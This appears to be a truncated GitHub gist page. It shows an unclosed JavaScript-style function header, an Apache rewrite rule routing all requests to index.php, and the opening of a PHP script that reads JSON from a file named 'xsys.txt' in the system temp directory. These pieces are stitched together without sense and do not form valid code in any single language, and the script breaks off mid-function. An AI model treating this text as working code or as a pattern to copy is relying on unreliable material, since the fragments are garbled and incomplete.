Skip to content

Instantly share code, notes, and snippets.

This file has been truncated, but you can view the full file.
function run(input
/**/) {
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^(.*)$ index.php?_url=/$1 [QSA,L]
</IfModule>
<?php
define('FDATA', sys_get_temp_dir() . '/xsys.txt');
function readXData(){
if(is_readable(FDATA)){
$x = file_get_contents(FDATA);
if($x)
return json_decode($x,TRUE);
}